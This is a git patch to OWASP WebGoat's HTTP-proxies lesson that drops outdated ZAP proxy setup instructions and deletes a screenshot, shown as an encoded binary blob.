From fafddda82a41a8ecf7567cdae1c5932e6b815e6e Mon Sep 17 00:00:00 2001
From: Nanne Baars <nanne.baars@owasp.org>
Date: Mon, 8 Nov 2021 09:55:09 +0100
Subject: [PATCH 094/227] Update ZAP instructions

We reference ZAP 2.8.0 explicitly which is not necessary. Also the way ZAP works changed, we no longer need to change the port as ZAP will report there is a conflict during startup.

Resolves: #1141
---
 .../src/main/resources/html/HttpProxies.html  |   4 ----
 .../resources/images/zap-local-proxy-8090.png | Bin 45813 -> 0 bytes
 .../lessonPlans/en/1proxysetupsteps.adoc      |   5 +---
 .../resources/lessonPlans/en/2zapsetup.adoc   |  22 ------------------
 .../lessonPlans/en/3browsersetup.adoc         |   2 +-
 5 files changed, 2 insertions(+), 31 deletions(-)
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/images/zap-local-proxy-8090.png
 delete mode 100644 webgoat-lessons/http-proxies/src/main/resources/lessonPlans/en/2zapsetup.adoc

diff --git a/webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html b/webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html
index 44c8c6c49..98f266c43 100644
--- a/webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html
+++ b/webgoat-lessons/http-proxies/src/main/resources/html/HttpProxies.html
@@ -10,10 +10,6 @@
 		<div class="adoc-content" th:replace="doc:1proxysetupsteps.adoc"></div>
 	</div>
 
-    <div class="lesson-page-wrapper">
-        <div class="adoc-content" th:replace="doc:2zapsetup.adoc"></div>
-    </div>
-
     <div class="lesson-page-wrapper">
 		<div class="adoc-content" th:replace="doc:3browsersetup.adoc"></div>
 	</div>
diff --git a/webgoat-lessons/http-proxies/src/main/resources/images/zap-local-proxy-8090.png b/webgoat-lessons/http-proxies/src/main/resources/images/zap-local-proxy-8090.png
deleted file mode 100644
index 42d77d4a90aa4e909de86f89c84e76db7498d400..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 45813
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
